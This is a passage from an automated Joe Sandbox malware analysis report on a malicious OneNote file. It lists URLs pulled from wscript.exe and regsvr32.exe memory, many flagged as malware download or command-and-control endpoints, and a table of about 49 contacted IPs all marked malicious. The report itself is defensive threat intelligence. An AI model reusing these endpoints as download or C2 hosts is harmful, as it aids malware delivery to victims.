                                          http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://my.microsoftpersonalcontent.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://penshorn.org/wscript.exe, 00000001.00000003.387940812.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416607803.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410465872.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416558932.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BDD000.00000004.00000020.00020000.00000000.sdmptrue
                                          • 8%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://store.office.cn/addinstemplate0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://messaging.engagement.office.com/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                            		high
                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                              		high
                                              https://www.odwebp.svc.ms0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://api.powerbi.com/v1.0/myorg/groups0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                		high
                                                https://web.microsoftstream.com/video/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                  		high
                                                  https://213.239.212.5/xqnhpb/lregsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://api.addins.store.officeppe.com/addinstemplate0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://graph.windows.net0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                    		high
                                                    https://159.89.202.34:443/xqnhpb/b/regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://213.239.212.5/xqnhpb/vregsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://186.194.240.217/xqnhpb//regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://consent.config.office.com/consentcheckin/v1.0/consents0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                      		high
                                                      https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                        		high
                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                          		high
                                                          https://d.docs.live.net0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://ncus.contentsync.0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://169.57.156.166:8080/xqnhpb/regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://91.121.146.47:8080/xqnhpb/tGregsvr32.exe, 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                            		high
                                                            http://weather.service.msn.com/data.aspx0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                              		high
                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                		high
                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                  		high
                                                                  https://pushchannel.1drv.ms0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                    		high
                                                                    https://107.170.39.149:8080/$regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://91.121.146.47:8080/xqnhpb/Zregsvr32.exe, 00000004.00000003.468128599.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://wus2.contentsync.0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://clients.config.office.net/user/v1.0/ios0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                      		high
                                                                      https://o365auditrealtimeingestion.manage.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                        		high
                                                                        https://outlook.office365.com/api/v1.0/me/Activities0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                          		high
                                                                          https://clients.config.office.net/user/v1.0/android/policies0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                            		high
                                                                            https://entitlement.diagnostics.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                              		high
                                                                              https://149.56.131.28:8080/regsvr32.exe, 00000004.00000002.885918510.0000000002EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                		high
                                                                                https://storage.live.com/clientlogs/uploadlocation0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                  		high
                                                                                  https://microsoftapc-my.sharepoint.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://substrate.office.com/search/api/v1/SearchHistory0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                    		high
                                                                                    https://45.235.8.30:8080/regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://clients.config.office.net/c2r/v1.0/InteractiveInstallation0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                      		high
                                                                                      https://213.239.212.5:443/xqnhpb/regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://graph.windows.net/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                        		high
                                                                                        https://devnull.onenote.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                          		high
                                                                                          https://messaging.office.com/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                            		high
                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                              		high
                                                                                              https://skyapi.live.net/Activity/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://91.121.146.47:8080/xqnhpb/%%regsvr32.exe, 00000004.00000003.526872204.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://45.235.8.30:8080/xqnhpb/regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://www.gomespontes.com.br/logs/pd/wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://api.cortana.ai0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://messaging.action.office.com/setcampaignaction0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                		high
                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                  		high
                                                                                                  https://staging.cortana.ai0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://onedrive.live.com/embed?0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                    		high
                                                                                                    https://augloop.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                      		high
                                                                                                      https://api.diagnosticssdf.office.com/v2/file0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                        		high
                                                                                                        https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                          		high
                                                                                                          https://api.diagnostics.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                            		high
                                                                                                            https://store.office.de/addinstemplate0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                              		high
                                                                                                              https://wus2.pagecontentsync.0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://api.powerbi.com/v1.0/myorg/datasets0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                		high
                                                                                                                https://82.223.21.224:8080/xqnhpb/regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                http://ozmeydan.com/cekici/9/xMwscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://cortana.ai/api0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://160.16.142.56:8080/regsvr32.exe, 00000004.00000002.884919905.0000000000CC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://213.239.212.5///regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://45.235.8.30:8080/xqnhpb/b/4regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://penshorn.org:443/admin/Ses8712iGR8du/wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409368396.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409588847.0000000005B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416274274.0000000005B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409409593.0000000005B48000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://103.43.75.120/Pregsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://api.diagnosticssdf.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                  		high
                                                                                                                  https://login.microsoftonline.com/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                    		high
                                                                                                                    http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                      		high
                                                                                                                      https://45.235.8.30:8080/xqnhpb//regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://api.addins.omex.office.net/appinfo/query0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                        		high
                                                                                                                        https://clients.config.office.net/user/v1.0/tenantassociationkey0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                          		high
                                                                                                                          https://powerlift.acompli.net0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://cortana.ai0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          110.232.117.186
                                                                                                                          		unknownAustralia
                                                                                                                          		56038RACKCORP-APRackCorpAUtrue
                                                                                                                          103.132.242.26
                                                                                                                          		unknownIndia
                                                                                                                          		45117INPL-IN-APIshansNetworkINtrue
                                                                                                                          104.168.155.143
                                                                                                                          		unknownUnited States
                                                                                                                          		54290HOSTWINDSUStrue
                                                                                                                          79.137.35.198
                                                                                                                          		unknownFrance
                                                                                                                          		16276OVHFRtrue
                                                                                                                          115.68.227.76
                                                                                                                          		unknownKorea Republic of
                                                                                                                          		38700SMILESERV-AS-KRSMILESERVKRtrue
                                                                                                                          163.44.196.120
                                                                                                                          		unknownSingapore
                                                                                                                          		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
                                                                                                                          206.189.28.199
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          203.26.41.131
                                                                                                                          		penshorn.orgAustralia
                                                                                                                          		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                                          107.170.39.149
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          66.228.32.31
                                                                                                                          		unknownUnited States
                                                                                                                          		63949LINODE-APLinodeLLCUStrue
                                                                                                                          197.242.150.244
                                                                                                                          		unknownSouth Africa
                                                                                                                          		37611AfrihostZAtrue
                                                                                                                          185.4.135.165
                                                                                                                          		unknownGreece
                                                                                                                          		199246TOPHOSTGRtrue
                                                                                                                          183.111.227.137
                                                                                                                          		unknownKorea Republic of
                                                                                                                          		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                          45.176.232.124
                                                                                                                          		unknownColombia
                                                                                                                          		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                                                                                          169.57.156.166
                                                                                                                          		unknownUnited States
                                                                                                                          		36351SOFTLAYERUStrue
                                                                                                                          164.68.99.3
                                                                                                                          		unknownGermany
                                                                                                                          		51167CONTABODEtrue
                                                                                                                          139.59.126.41
                                                                                                                          		unknownSingapore
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          167.172.253.162
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          167.172.199.165
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          202.129.205.3
                                                                                                                          		unknownThailand
                                                                                                                          		45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
                                                                                                                          147.139.166.154
                                                                                                                          		unknownUnited States
                                                                                                                          		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                          153.92.5.27
                                                                                                                          		unknownGermany
                                                                                                                          		47583AS-HOSTINGERLTtrue
                                                                                                                          159.65.88.10
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          172.105.226.75
                                                                                                                          		unknownUnited States
                                                                                                                          		63949LINODE-APLinodeLLCUStrue
                                                                                                                          164.90.222.65
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          213.239.212.5
                                                                                                                          		unknownGermany
                                                                                                                          		24940HETZNER-ASDEtrue
                                                                                                                          5.135.159.50
                                                                                                                          		unknownFrance
                                                                                                                          		16276OVHFRtrue
                                                                                                                          186.194.240.217
                                                                                                                          		unknownBrazil
                                                                                                                          		262733NetceteraTelecomunicacoesLtdaBRtrue
                                                                                                                          119.59.103.152
                                                                                                                          		unknownThailand
                                                                                                                          		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
                                                                                                                          159.89.202.34
                                                                                                                          		unknownUnited States
                                                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                                                          91.121.146.47
                                                                                                                          		unknownFrance
                                                                                                                          		16276OVHFRtrue
                                                                                                                          160.16.142.56
                                                                                                                          		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                                                          201.94.166.162
                                                                                                                          		unknownBrazil
                                                                                                                          		28573CLAROSABRtrue
                                                                                                                          91.207.28.33
                                                                                                                          		unknownKyrgyzstan
                                                                                                                          		39819PROHOSTKGtrue
                                                                                                                          103.75.201.2
                                                                                                                          		unknownThailand
                                                                                                                          		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                                                                          103.43.75.120
                                                                                                                          		unknownJapan20473AS-CHOOPAUStrue
                                                                                                                          188.44.20.25
                                                                                                                          		unknownMacedonia
                                                                                                                          		57374GIV-ASMKtrue
                                                                                                                          45.235.8.30
                                                                                                                          		unknownBrazil
                                                                                                                          		267405WIKINETTELECOMUNICACOESBRtrue
                                                                                                                          153.126.146.25
                                                                                                                          		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                          72.15.201.15
                                                                                                                          		unknownUnited States
                                                                                                                          		13649ASN-VINSUStrue
                                                                                                                          187.63.160.88
                                                                                                                          		unknownBrazil
                                                                                                                          		28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
                                                                                                                          82.223.21.224
                                                                                                                          		unknownSpain
                                                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                          173.212.193.249
                                                                                                                          		unknownGermany
                                                                                                                          		51167CONTABODEtrue
                                                                                                                          95.217.221.146
                                                                                                                          		unknownGermany
                                                                                                                          		24940HETZNER-ASDEtrue
                                                                                                                          149.56.131.28
                                                                                                                          		unknownCanada
                                                                                                                          		16276OVHFRtrue
                                                                                                                          182.162.143.56
                                                                                                                          		unknownKorea Republic of
                                                                                                                          		3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                          1.234.2.232
                                                                                                                          		unknownKorea Republic of
                                                                                                                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                          129.232.188.93
                                                                                                                          		unknownSouth Africa
                                                                                                                          		37153xneeloZAtrue
                                                                                                                          94.23.45.86
                                                                                                                          		unknownFrance
                                                                                                                          		16276OVHFRtrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox Version:37.0.0 Beryl
                                                                                                                          Analysis ID:828505
                                                                                                                          Start date and time:2023-03-17 09:21:51 +01:00
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 12m 17s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample file name:iMedPub_LTD_6.one
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.expl.evad.winONE@11/430@1/49
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 50.2% (good quality ratio 42.4%)
                                                                                                                          • Quality average: 60.5%
                                                                                                                          • Quality standard deviation: 35.6%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 89%
                                                                                                                          • Number of executed functions: 20
                                                                                                                          • Number of non-executed functions: 136
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .one
                                                                                                                          • Override analysis time to 240s for rundll32

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.76.141, 20.126.106.131, 20.223.130.133, 209.197.3.8
                                                                                                                          • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, ctldl.windowsupdate.com, officeclient.microsoft.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
